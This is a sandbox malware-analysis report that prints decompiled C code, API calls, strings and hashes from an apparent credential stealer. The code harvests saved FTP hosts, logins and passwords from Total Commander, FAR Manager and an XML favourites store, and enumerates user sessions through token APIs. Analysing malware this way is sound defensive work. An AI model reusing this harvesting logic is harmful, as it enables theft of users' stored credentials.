					if(_t42 == 0) {
						goto L21;
					}
					_t43 = GetPrivateProfileStringW(0, 0, 0, _t42, 0xffff,  &_v524);
					if(_t43 <= 0) {
						L20:
						E004097F7(_v540);
						goto L21;
					}
					_t9 = _t43 + 1; // 0x1
					if(E0040A6AE(_v540, _t9) == 0) {
						goto L20;
					}
					_t85 = HeapAlloc( *0x41a570, 8, 0xc20);
					_v536 = _t85;
					if(_t85 == 0) {
						goto L20;
					} else {
						_t12 =  &(_t85[0x1fe]); // 0x3fc
						_v532 =  &(_t12[0xff]);
						_v544 = _v540;
						goto L9;
						L18:
						_t52 = E0040A6EC(_v548, 1);
						_v552 = _t52;
						if(_t52 != 0) {
							_t85 = _v540;
							L9:
							if(StrStrIW(_v544, L"_config_") == 0 && GetPrivateProfileStringW(_v548, L"HOST", 0, _t85, 0xff,  &_v528) > 0) {
								_t57 = GetPrivateProfileIntW(_v548, L"PORT", 0x15,  &_v528);
								_v532 = _t57;
								if(_t57 - 1 <= 0xfffe) {
									_t86 =  &(_t85[0xff]);
									if(GetPrivateProfileStringW(_v548, L"UID", 0, _t86, 0xff,  &_v528) > 0) {
										_t26 =  &(_t86[0xff]); // 0x0
										if(GetPrivateProfileStringW(_v548, L"PWD", 0, _t26, 0xff,  &_v528) > 0) {
											_t28 =  &(_t86[0xff]); // 0x0
											_t77 = _t28;
											if(E0040A3AA(_t77) > 0) {
												_push(_v532);
												_push(_v540);
												_push(_t77);
												_push(_t86);
												_t87 = _v536;
												_t65 = E0040A4B7(_t64, 0x311, _v536, L"ftp://%s:%s@%s:%u\n");
												_t95 = _t95 + 0x14;
												if(_t65 > 0) {
													_t88 = _a4;
													if(E00409B2A(_t65, _t88, _t87) != 0) {
														 *((intOrPtr*)(_t88 + 4)) =  *((intOrPtr*)(_t88 + 4)) + 1;
													}
												}
											}
										}
									}
								}
							}
							goto L18;
						} else {
							E004097F7(_v540);
							goto L20;
						}
					}
				} else {
					E00405B75( &_v524, _a4);
					goto L21;
				}
			}

0x00405ba3
0x00405bbe
0x00405d71
0x00405d79
0x00405d79
0x00405bc7
0x00405bed
0x00405bf1
0x00405bf7
0x00000000
0x00000000
0x00405c11
0x00405c15
0x00405d68
0x00405d6c
0x00000000
0x00405d6c
0x00405c1b
0x00405c29
0x00000000
0x00000000
0x00405c3e
0x00405c40
0x00405c46
0x00000000
0x00405c4c
0x00405c4c
0x00405c57
0x00405c5f
0x00405c68
0x00405d48
0x00405d4e
0x00405d53
0x00405d59
0x00405c6a
0x00405c6e
0x00405c7f
0x00405cb1
0x00405cb7
0x00405cc1
0x00405ccd
0x00405ce3
0x00405ceb
0x00405d01
0x00405d03
0x00405d03
0x00405d10
0x00405d12
0x00405d1b
0x00405d1f
0x00405d20
0x00405d21
0x00405d2a
0x00405d2f
0x00405d34
0x00405d37
0x00405d43
0x00405d45
0x00405d45
0x00405d43
0x00405d34
0x00405d10
0x00405d01
0x00405ce3
0x00405cc1
0x00000000
0x00405d5f
0x00405d63
0x00000000
0x00405d63
0x00405d59
0x00405bc9
0x00405bd0
0x00000000
0x00405bd0

APIs

Part of subcall function 0040B635: PathCombineW.SHLWAPI(?,?,00401EC0,004076D9,?,?,?,00000000), ref: 0040B64C

HeapAlloc.KERNEL32(00000008,00020002,?), ref: 00405BED
GetPrivateProfileStringW.KERNEL32 ref: 00405C11
HeapAlloc.KERNEL32(00000008,00000C20), ref: 00405C3C
StrStrIW.SHLWAPI(?,_config_), ref: 00405C77
GetPrivateProfileStringW.KERNEL32 ref: 00405C97
GetPrivateProfileIntW.KERNEL32 ref: 00405CB1
GetPrivateProfileStringW.KERNEL32 ref: 00405CDF
GetPrivateProfileStringW.KERNEL32 ref: 00405CFD

Strings

UID, xrefs: 00405CD6
ftp://%s:%s@%s:%u, xrefs: 00405D25
PORT, xrefs: 00405CA8
PWD, xrefs: 00405CF4
_config_, xrefs: 00405C6E
HOST, xrefs: 00405C8E

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: PrivateProfile$String$AllocHeap$CombinePath
String ID: HOST$PORT$PWD$UID$_config_$ftp://%s:%s@%s:%u
API String ID: 3432043379-3332413901
Opcode ID: 3f39c7fdf83291b66c80ede879fe6d4100ff819560a49a18ddfee6315d7c7fc0
Instruction ID: a6f7df92049d92c5ee17232819e1ac4f38da4fb3439b1490f9f9664f51960863
Opcode Fuzzy Hash: 3f39c7fdf83291b66c80ede879fe6d4100ff819560a49a18ddfee6315d7c7fc0
Instruction Fuzzy Hash: 1A41CD71144306ABD3109F21CC85EABB7E8FF98744F04493FB884B62E1D738E9059E5A

Uniqueness

Uniqueness Score: -1.00%

Function 004059F8, Relevance: 24.6, APIs: 4, Strings: 10, Instructions: 118
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 71%

			E004059F8(char* __ecx, char** __edx, void* __eflags) {
				signed int _v8;
				intOrPtr _v12;
				char _v16;
				char* _v20;
				char* _v24;
				char* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				short _v558;
				char _v564;
				short _v1084;
				void* __edi;
				void* __esi;
				int _t41;
				WCHAR* _t69;
				intOrPtr _t70;
				WCHAR* _t71;
				void* _t72;
				intOrPtr _t86;

				_t67 = __edx;
				_t65 = __ecx;
				E004098AA( &_v16,  &_v16, 0, 8);
				_t69 =  &_v564;
				_t41 = E0040ED7B(0x104, _t69, 0x80000001, L"SOFTWARE\\Ghisler\\Total Commander", L"ftpininame");
				if(_t41 != 0xffffffff && _t41 > 0) {
					ExpandEnvironmentStringsW(_t69,  &_v1084, 0x104);
					_push( &_v16);
					E00405841(_t67,  &_v1084);
					_t41 = PathRemoveFileSpecW( &_v1084);
				}
				if(_v12 != 0) {
					L15:
					if(_t86 > 0) {
						E00412508(_t41, _v16, _t67, _t86, L"Total Commander");
					}
					return E004097F7(_v16);
				} else {
					_v8 = _v8 & 0x00000000;
					_v44 = 0x24;
					_v40 = 0x1a;
					_v36 = 0x26;
					_v32 = 0x23;
					_v28 = L"*totalcmd*";
					_v24 = L"*total*commander*";
					_v20 = L"*ghisler*";
					do {
						_t70 =  *((intOrPtr*)(_t72 + _v8 * 4 - 0x28));
						_t41 = 0;
						__imp__SHGetFolderPathW(0, _t70, 0, 0,  &_v564);
						if(0 == 0) {
							if(_t70 == 0x24) {
								E0040580C(_t65,  &_v564,  &_v16, 0);
								_v558 = 0;
							}
							_t67 =  &_v28;
							_t65 =  &_v564;
							_t41 = E0040B4D8( &_v564,  &_v28, 0, 3, 2, E004059AF,  &_v16, 0, 0, 0);
						}
						_v8 = _v8 + 1;
					} while (_v8 < 4);
					if(_v12 == 0) {
						_t71 =  &_v564;
						_t41 = E0040ED7B(0x104, _t71, 0x80000001, L"SOFTWARE\\Ghisler\\Total Commander", L"installdir");
						if(_t41 != 0xffffffff && _t41 > 0) {
							ExpandEnvironmentStringsW(_t71,  &_v1084, 0x104);
							_t41 = E0040580C(_t65,  &_v1084,  &_v16, 1);
						}
						_t86 = _v12;
					}
					goto L15;
				}
			}

0x004059f8
0x004059f8
0x00405a0c
0x00405a26
0x00405a2c
0x00405a34
0x00405a45
0x00405a4e
0x00405a56
0x00405a62
0x00405a62
0x00405a6c
0x00405b59
0x00405b59
0x00405b63
0x00405b63
0x00405b74
0x00405a72
0x00405a72
0x00405a76
0x00405a7d
0x00405a84
0x00405a8b
0x00405a92
0x00405a99
0x00405aa0
0x00405aa7
0x00405aaa
0x00405ab5
0x00405abb
0x00405ac3
0x00405ac8
0x00405ad6
0x00405add
0x00405add
0x00405af6
0x00405af9
0x00405aff
0x00405aff
0x00405b04
0x00405b07
0x00405b11
0x00405b1e
0x00405b24
0x00405b2c
0x00405b3d
0x00405b50
0x00405b50
0x00405b55
0x00405b55
0x00000000
0x00405b11

APIs

ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,80000001,SOFTWARE\Ghisler\Total Commander,ftpininame,?,00000000,00000008), ref: 00405A45

Part of subcall function 00405841: HeapAlloc.KERNEL32(00000008,00020002,?,?,?,?,?), ref: 0040585B
Part of subcall function 00405841: GetPrivateProfileStringW.KERNEL32 ref: 00405880
Part of subcall function 00405841: HeapAlloc.KERNEL32(00000008,00000C0C,?,?,?,?,?), ref: 004058A9
Part of subcall function 00405841: StrStrIW.SHLWAPI(00000000,connections,?,?,?,?,?), ref: 004058D1
Part of subcall function 00405841: StrStrIW.SHLWAPI(00000000,default,?,?,?,?,?), ref: 004058E1
Part of subcall function 00405841: GetPrivateProfileStringW.KERNEL32 ref: 004058FC
Part of subcall function 00405841: GetPrivateProfileStringW.KERNEL32 ref: 00405916
Part of subcall function 00405841: GetPrivateProfileStringW.KERNEL32 ref: 00405930

PathRemoveFileSpecW.SHLWAPI(?,?,?), ref: 00405A62
SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?,80000001,SOFTWARE\Ghisler\Total Commander,ftpininame,?,00000000,00000008), ref: 00405ABB
ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,80000001,SOFTWARE\Ghisler\Total Commander,installdir), ref: 00405B3D

Strings

*total*commander*, xrefs: 00405A99
SOFTWARE\Ghisler\Total Commander, xrefs: 00405A16, 00405B18
installdir, xrefs: 00405B13
&, xrefs: 00405A84
ftpininame, xrefs: 00405A11
*ghisler*, xrefs: 00405AA0
$, xrefs: 00405A76
*totalcmd*, xrefs: 00405A92
#, xrefs: 00405A8B
Total Commander, xrefs: 00405B5E

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: PrivateProfileString$AllocEnvironmentExpandHeapPathStrings$FileFolderRemoveSpec
String ID: #$$$&$*ghisler*$*total*commander*$*totalcmd*$SOFTWARE\Ghisler\Total Commander$Total Commander$ftpininame$installdir
API String ID: 1509886900-494292338
Opcode ID: b11e2c785df9fc5e36deedda68cb1cbb24807b216b6dc0bcd623474b7d867e94
Instruction ID: d0496fbeca5ca4292bec58df087c560aa84fc0957079f3727e1bf17ac23a22f9
Opcode Fuzzy Hash: b11e2c785df9fc5e36deedda68cb1cbb24807b216b6dc0bcd623474b7d867e94
Instruction Fuzzy Hash: 1641FAB2D00218AADB20AAA5CC89BDFB7BCEB04715F1041A6A515F31D0D7786B44CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0040618E, Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 156
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E0040618E() {
				void* _v8;
				int _v12;
				void* _v16;
				signed int _v20;
				int _v24;
				intOrPtr _v28;
				char _v32;
				char* _v36;
				char* _v40;
				short _v564;
				void* __edi;
				void* __esi;
				void* _t51;
				void* _t57;
				int _t65;
				int _t71;
				int _t73;
				int _t77;
				void* _t79;
				void* _t81;
				void* _t88;
				int _t90;
				void* _t95;
				void* _t96;

				_t51 = HeapAlloc( *0x41a570, 8, 0xc0c);
				_t90 = 0;
				_v16 = _t51;
				if(_t51 == 0) {
					return _t51;
				} else {
					_v40 = L"SOFTWARE\\Far\\Plugins\\ftp\\hosts";
					_v36 = L"SOFTWARE\\Far2\\Plugins\\ftp\\hosts";
					E004098AA( &_v32,  &_v32, 0, 8);
					_v20 = 0;
					do {
						if(RegOpenKeyExW(0x80000001,  *(_t95 + _v20 * 4 - 0x24), _t90, 8,  &_v8) != 0) {
							goto L19;
						}
						_v24 = _t90;
						_v12 = 0x104;
						if(RegEnumKeyExW(_v8, _t90,  &_v564,  &_v12, _t90, _t90, _t90, _t90) != 0) {
							L18:
							RegCloseKey(_v8);
							goto L19;
						} else {
							goto L4;
						}
						do {
							L4:
							_t91 = _v16;
							_v24 = _v24 + 1;
							_t65 = E0040ED7B(0xff, _v16, _v8,  &_v564, L"hostname");
							_v12 = _t65;
							if(_t65 != 0xffffffff && _t65 > 0) {
								_t71 = E0040ED7B(0xff, _t91 + 0x1fe, _v8,  &_v564, L"username");
								_v12 = _t71;
								if(_t71 == 0xffffffff || _t71 <= 0) {
									_t73 = E0040ED7B(0xff, _v16 + 0x1fe, _v8,  &_v564, L"user");
									_v12 = _t73;
									if(_t73 == 0xffffffff || _t73 <= 0) {
										goto L16;
									} else {
										goto L10;
									}
								} else {
									L10:
									_t88 = _v16 + 0x3fc;
									_t77 = E0040EE27(_v8,  &_v564, L"password", 0, _t88, 0xff);
									_v12 = _t77;
									if(_t77 != 0xffffffff && _t77 > 0 && E00406133(_t88) > 0) {
										_t79 = _v16;
										_push(_t79);
										_push(_t88);
										_push(_t79 + 0x1fe);
										_t89 = _t88 + 0x1fe;
										_t81 = E0040A4B7(_t79 + 0x1fe, 0x307, _t88 + 0x1fe, L"ftp://%s:%s@%s\n");
										_t96 = _t96 + 0x10;
										if(_t81 > 0 && E00409B2A(_t81,  &_v32, _t89) != 0) {
											_v28 = _v28 + 1;
										}
									}
									goto L16;
								}
							}
							L16:
							_v12 = 0x104;
						} while (RegEnumKeyExW(_v8, _v24,  &_v564,  &_v12, 0, 0, 0, 0) == 0);
						_t90 = 0;
						goto L18;
						L19:
						_v20 = _v20 + 1;
					} while (_v20 < 2);
					_t57 = E004097F7(_v16);
					_t115 = _v28 - _t90;
					if(_v28 > _t90) {
						E00412508(_t57, _v32, 0x307, _t115, L"FAR manager");
					}
					return E004097F7(_v32);
				}
			}

0x004061a7
0x004061ad
0x004061af
0x004061b4
0x00406383
0x004061ba
0x004061c1
0x004061c8
0x004061cf
0x004061d4
0x004061dc
0x004061f7
0x00000000
0x00000000
0x00406210
0x00406213
0x00406222
0x00406347
0x0040634a
0x00000000
0x00000000
0x00000000
0x00000000
0x00406228
0x00406228
0x00406228
0x0040622b
0x0040623f
0x00406244
0x0040624a
0x0040626d
0x00406272
0x00406278
0x00406296
0x0040629b
0x004062a1
0x00000000
0x00000000
0x00000000
0x00000000
0x004062a7
0x004062a7
0x004062b0
0x004062c8
0x004062cd
0x004062d3
0x004062e2
0x004062e5
0x004062e6
0x004062ec
0x004062f7
0x004062fd
0x00406302
0x00406307
0x00406316
0x00406316
0x00406307
0x00000000
0x004062d3
0x00406278
0x00406319
0x0040632d
0x0040633d
0x00406345
0x00000000
0x00406350
0x00406350
0x00406353
0x00406360
0x00406365
0x00406368
0x00406372
0x00406372
0x00000000
0x0040637a

APIs

HeapAlloc.KERNEL32(00000008,00000C0C), ref: 004061A7
RegOpenKeyExW.ADVAPI32(80000001,00401AB4,00000000,00000008,?,?,00000000,00000008), ref: 004061EF
RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0040621A
RegEnumKeyExW.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000,?,?,hostname), ref: 00406337
RegCloseKey.ADVAPI32(?), ref: 0040634A

Strings

hostname, xrefs: 0040622E
SOFTWARE\Far2\Plugins\ftp\hosts, xrefs: 004061C8
user, xrefs: 00406281
password, xrefs: 004062B9
username, xrefs: 00406258
ftp://%s:%s@%s, xrefs: 004062ED
FAR manager, xrefs: 0040636D
SOFTWARE\Far\Plugins\ftp\hosts, xrefs: 004061C1

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: Enum$AllocCloseHeapOpen
String ID: FAR manager$SOFTWARE\Far2\Plugins\ftp\hosts$SOFTWARE\Far\Plugins\ftp\hosts$ftp://%s:%s@%s$hostname$password$user$username
API String ID: 2215211458-3053216382
Opcode ID: f305ae9e966f8aa26a5e1c730757deaf8058a4637653e41d8ade20a64f166b15
Instruction ID: c121730c7e990dfaa939bbea0f4b585301b8e01d214b6b9aca9c5a77ccd6ffa8
Opcode Fuzzy Hash: f305ae9e966f8aa26a5e1c730757deaf8058a4637653e41d8ade20a64f166b15
Instruction Fuzzy Hash: 7F518F71D00119BBDB10ABA1CD85EEFBBB8EF04314F10417AB911F62E1D7389A51CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040851A, Relevance: 22.8, APIs: 6, Strings: 7, Instructions: 84
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 51%

			E0040851A(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				char _v8;
				char _v12;
				_Unknown_base(*)()* _v16;
				intOrPtr _v20;
				struct HINSTANCE__* _v24;
				void* __esi;
				struct HINSTANCE__* _t20;
				_Unknown_base(*)()* _t23;
				intOrPtr _t25;
				intOrPtr _t31;
				struct HINSTANCE__* _t35;
				_Unknown_base(*)()* _t36;
				void* _t37;
				intOrPtr* _t38;
				intOrPtr* _t40;
				void* _t42;
				void* _t45;

				_t37 = __ecx;
				_t20 = LoadLibraryA("wtsapi32.dll");
				_t35 = _t20;
				_v24 = _t35;
				if(_t35 == 0) {
					return _t20;
				}
				_t40 = GetProcAddress(_t35, "WTSEnumerateSessionsW");
				_v16 = GetProcAddress(_t35, "WTSFreeMemory");
				_t23 = GetProcAddress(_t35, "WTSQueryUserToken");
				_t45 = 0;
				_t36 = _t23;
				if(_t40 == 0 || _v16 == 0 || _t36 == 0) {
					L14:
					return FreeLibrary(_v24);
				} else {
					_t25 = E0040F3C3(L"SeTcbPrivilege");
					__imp__WTSGetActiveConsoleSessionId();
					_v20 = _t25;
					if(_t25 != 0xffffffff) {
						E004084A9(_t37, 0, _t36, _t25, _a4, _a8);
					}
					_push( &_v8);
					_push( &_v12);
					_push(1);
					_push(_t45);
					_push(_t45);
					if( *_t40() == 0) {
						goto L14;
					} else {
						_t42 = 0;
						if(_v8 <= _t45) {
							L13:
							_v16(_v12);
							goto L14;
						} else {
							goto L8;
						}
						do {
							L8:
							_t38 = _t45 + _v12;
							_t31 =  *((intOrPtr*)(_t38 + 8));
							if(_t31 == 0 || _t31 == 4) {
								_t32 =  *_t38;
								if( *_t38 != _v20) {
									E004084A9(_t38, _t45, _t36, _t32, _a4, _a8);
								}
							}
							_t42 = _t42 + 1;
							_t45 = _t45 + 0xc;
						} while (_t42 < _v8);
						goto L13;
					}
				}
			}

0x0040851a
0x00408526
0x0040852c
0x0040852e
0x00408533
0x004085ef
0x004085ef
0x0040854f
0x00408559
0x0040855c
0x0040855e
0x00408560
0x00408564
0x004085e2
0x00000000
0x0040856f
0x00408574
0x00408579
0x0040857f
0x00408585
0x0040858f
0x0040858f
0x00408597
0x0040859b
0x0040859c
0x0040859e
0x0040859f
0x004085a4
0x00000000
0x004085a6
0x004085a6
0x004085ab
0x004085dc
0x004085df
0x00000000
0x00000000
0x00000000
0x00000000
0x004085ad
0x004085ad
0x004085b0
0x004085b3
0x004085b8
0x004085bf
0x004085c4
0x004085ce
0x004085ce
0x004085c4
0x004085d3
0x004085d4
0x004085d7
0x00000000
0x004085ad
0x004085a4

APIs

LoadLibraryA.KERNEL32(wtsapi32.dll,00000000,000000FF,00408169,?,?,74B05B60), ref: 00408526
GetProcAddress.KERNEL32(00000000,WTSEnumerateSessionsW), ref: 00408547
GetProcAddress.KERNEL32(00000000,WTSFreeMemory), ref: 00408551
GetProcAddress.KERNEL32(00000000,WTSQueryUserToken), ref: 0040855C
FreeLibrary.KERNEL32(?), ref: 004085E5

Part of subcall function 0040F3C3: GetCurrentThread.KERNEL32 ref: 0040F3D3
Part of subcall function 0040F3C3: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,00408579,SeTcbPrivilege), ref: 0040F3DA
Part of subcall function 0040F3C3: OpenProcessToken.ADVAPI32(000000FF,00000020,?,?,?,?,?,?,?,?,?,?,00408579,SeTcbPrivilege), ref: 0040F3EC

WTSGetActiveConsoleSessionId.KERNEL32(SeTcbPrivilege), ref: 00408579

Part of subcall function 004084A9: EqualSid.ADVAPI32(00000000,004085F2,?,004085F2), ref: 004084CE
Part of subcall function 004084A9: CloseHandle.KERNEL32(?,?,004085F2), ref: 0040850F

Strings

WTSQueryUserToken, xrefs: 00408553
.exe, xrefs: 00408540
SeTcbPrivilege, xrefs: 0040856F
wtsapi32.dll, xrefs: 00408521
C:\Users\Jamey\AppData\Roaming, xrefs: 0040859E, 0040859F
WTSEnumerateSessionsW, xrefs: 00408541
WTSFreeMemory, xrefs: 00408549

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryOpenThreadToken$ActiveCloseConsoleCurrentEqualFreeHandleLoadProcessSession
String ID: .exe$C:\Users\Jamey\AppData\Roaming$SeTcbPrivilege$WTSEnumerateSessionsW$WTSFreeMemory$WTSQueryUserToken$wtsapi32.dll
API String ID: 1107370034-958812519
Opcode ID: d93732f1c3c94aab4e142760745bed6c4e88355f5b5cec4ca7f5949e1774359e
Instruction ID: 1f2906e00345388cece8d384ddd2385305de9ea3d01048cbe34de2aa4c3f7b5e
Opcode Fuzzy Hash: d93732f1c3c94aab4e142760745bed6c4e88355f5b5cec4ca7f5949e1774359e
Instruction Fuzzy Hash: 36219271A00219BFCF21ABA5CE84C9F7B78EF04714B14443BF955B22D0DA7C9E418BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00406FCD, Relevance: 21.2, APIs: 5, Strings: 7, Instructions: 198
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E00406FCD(void* __ecx, signed char* __edx, void* __eflags, intOrPtr _a4) {
				char _v524;
				signed int _v548;
				char _v556;
				char* _v560;
				char _v564;
				char _v568;
				intOrPtr* _v572;
				char _v576;
				intOrPtr* _v580;
				signed int _v584;
				char _v588;
				signed int _v592;
				char _v596;
				intOrPtr* _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				void* __edi;
				void* __esi;
				signed int _t64;
				intOrPtr* _t67;
				signed int _t68;
				intOrPtr* _t69;
				signed int _t72;
				intOrPtr* _t74;
				signed int _t75;
				intOrPtr* _t76;
				signed int _t77;
				intOrPtr* _t78;
				signed int _t79;
				intOrPtr* _t80;
				signed int _t81;
				signed int _t82;
				signed int _t87;
				signed int _t89;
				signed int _t91;
				signed int _t93;
				signed int _t102;
				signed int _t103;
				void* _t125;
				signed int _t126;
				intOrPtr* _t130;
				intOrPtr _t131;

				if(E0040B635( &(__edx[0x2c]),  &_v524, __ecx) == 0) {
					L48:
					return 1;
				}
				_t142 =  *__edx & 0x00000010;
				if(( *__edx & 0x00000010) == 0) {
					_t102 = E00410075( &_v524, __eflags,  &_v524);
					_v548 = _t102;
					__eflags = _t102;
					if(_t102 == 0) {
						goto L48;
					}
					_t64 =  *((intOrPtr*)( *_t102 + 0xb4))(_t102,  &_v564);
					__eflags = _t64;
					if(_t64 != 0) {
						L47:
						 *((intOrPtr*)( *_t102 + 8))(_t102);
						goto L48;
					}
					_t67 = _v572;
					_t68 =  *((intOrPtr*)( *_t67 + 0x1c))(_t67,  &_v568);
					__eflags = _t68;
					if(_t68 != 0) {
						L46:
						_t69 = _v580;
						 *((intOrPtr*)( *_t69 + 8))(_t69);
						goto L47;
					}
					_t125 = 0xc;
					_t72 = E0040A457(L"FavoriteItem", _v576, _t125);
					__eflags = _t72;
					if(_t72 != 0) {
						_t130 = __imp__#6;
						L45:
						 *_t130(_v576);
						goto L46;
					}
					_t74 = _v580;
					_t110 =  *_t74;
					_t75 =  *((intOrPtr*)( *_t74 + 0x94))(_t74, L"Host",  &_v556);
					__eflags = _t75;
					if(_t75 != 0) {
						_t22 =  &_v584;
						 *_t22 = _v584 & 0x00000000;
						__eflags =  *_t22;
					} else {
						_v584 = E004100F7(_t110,  &_v568);
					}
					_t76 = _v592;
					_t111 =  *_t76;
					_t77 =  *((intOrPtr*)( *_t76 + 0x94))(_t76, L"Port",  &_v556);
					__eflags = _t77;
					if(_t77 != 0) {
						_t29 =  &_v592;
						 *_t29 = _v592 & 0x00000000;
						__eflags =  *_t29;
					} else {
						_v592 = E004100F7(_t111,  &_v568);
					}
					_t78 = _v604;
					_t112 =  *_t78;
					_t79 =  *((intOrPtr*)( *_t78 + 0x94))(_t78, L"User",  &_v576);
					__eflags = _t79;
					if(_t79 != 0) {
						_t103 = 0;
						__eflags = 0;
					} else {
						_t103 = E004100F7(_t112,  &_v588);
					}
					_t80 = _v616;
					_t113 =  *_t80;
					_t121 =  &_v584;
					_t81 =  *((intOrPtr*)( *_t80 + 0x94))(_t80, L"Password",  &_v584);
					__eflags = _t81;
					if(_t81 != 0) {
						_t126 = 0;
						__eflags = 0;
					} else {
						_t126 = E004100F7(_t113,  &_v596);
					}
					_t82 = _v620;
					__eflags = _t82;
					if(_t82 == 0) {
						_t130 = __imp__#6;
						goto L37;
					} else {
						__eflags =  *_t82;
						if( *_t82 == 0) {
							L35:
							_t130 = __imp__#6;
							 *_t130(_v620);
							L37:
							__eflags = _v616;
							if(_v616 != 0) {
								 *_t130(_v616);
							}
							__eflags = _t103;
							if(_t103 != 0) {
								 *_t130(_t103);
							}
							__eflags = _t126;
							if(_t126 != 0) {
								 *_t130(_t126);
							}
							_t102 = _v608;
							goto L45;
						}
						__eflags = _t103;
						if(_t103 == 0) {
							goto L35;
						}
						__eflags =  *_t103;
						if( *_t103 == 0) {
							goto L35;
						}
						__eflags = _t126;
						if(_t126 == 0) {
							goto L35;
						}
						_t87 = E00406AE4(_t121, _t126);
						__eflags = _t87;
						if(_t87 <= 0) {
							goto L35;
						}
						_t88 = _v616;
						__eflags = _v616;
						if(_v616 == 0) {
							_t89 = 0;
							__eflags = 0;
						} else {
							_t89 = E00409E66(_t88);
						}
						__eflags = _t89 - 1;
						if(_t89 < 1) {
							L30:
							_t89 = 0x15;
							goto L31;
						} else {
							__eflags = _t89 - 0xffff;
							if(_t89 <= 0xffff) {
								L31:
								_v612 = _v612 & 0x00000000;
								_push(_t89);
								_push(_v620);
								_push(_t126);
								_t91 = E0040A532( &_v612, L"ftp://%s:%s@%s:%u\n", _t103);
								__eflags = _t91;
								if(_t91 > 0) {
									_t131 = _a4;
									_t93 = E00409B2A(_t91, _t131, _v612);
									__eflags = _t93;
									if(_t93 != 0) {
										_t47 = _t131 + 4;
										 *_t47 =  *(_t131 + 4) + 1;
										__eflags =  *_t47;
									}
								}
								E004097F7(_v612);
								goto L35;
							}
							goto L30;
						}
					}
				}
				_v560 = L"*.xml";
				E0040B4D8( &_v524,  &_v560, _t142, 1, 5, E00406FCD, _a4, 0, 0, 0);
				goto L48;
			}

0x00406fee
0x0040720e
0x00407216
0x00407216
0x00406ff4
0x00406ff7
0x0040702e
0x00407030
0x00407034
0x00407036
0x00000000
0x00000000
0x00407044
0x0040704a
0x0040704c
0x00407208
0x0040720b
0x00000000
0x0040720b
0x00407052
0x0040705e
0x00407061
0x00407063
0x004071fe
0x004071fe
0x00407205
0x00000000
0x00407205
0x0040706f
0x00407075
0x0040707a
0x0040707c
0x004071f2
0x004071f8
0x004071fc
0x00000000
0x004071fc
0x00407082
0x00407086
0x00407093
0x00407099
0x0040709b
0x004070ac
0x004070ac
0x004070ac
0x0040709d
0x004070a6
0x004070a6
0x004070b1
0x004070b5
0x004070c2
0x004070c8
0x004070ca
0x004070db
0x004070db
0x004070db
0x004070cc
0x004070d5
0x004070d5
0x004070e0
0x004070e4
0x004070f1
0x004070f7
0x004070f9
0x00407108
0x00407108
0x004070fb
0x00407104
0x00407104
0x0040710a
0x0040710e
0x00407110
0x0040711b
0x00407121
0x00407123
0x00407132
0x00407132
0x00407125
0x0040712e
0x0040712e
0x00407134
0x00407138
0x0040713a
0x004071cb
0x00000000
0x00407140
0x00407140
0x00407144
0x004071bd
0x004071c1
0x004071c7
0x004071d1
0x004071d1
0x004071d6
0x004071dc
0x004071dc
0x004071de
0x004071e0
0x004071e3
0x004071e3
0x004071e5
0x004071e7
0x004071ea
0x004071ea
0x004071ec
0x00000000
0x004071ec
0x00407146
0x00407148
0x00000000
0x00000000
0x0040714a
0x0040714e
0x00000000
0x00000000
0x00407150
0x00407152
0x00000000
0x00000000
0x00407154
0x00407159
0x0040715b
0x00000000
0x00000000
0x0040715d
0x00407161
0x00407163
0x0040716c
0x0040716c
0x00407165
0x00407165
0x00407165
0x0040716e
0x00407171
0x0040717a
0x0040717c
0x00000000
0x00407173
0x00407173
0x00407178
0x0040717d
0x0040717d
0x00407182
0x00407183
0x0040718b
0x00407193
0x0040719b
0x0040719d
0x0040719f
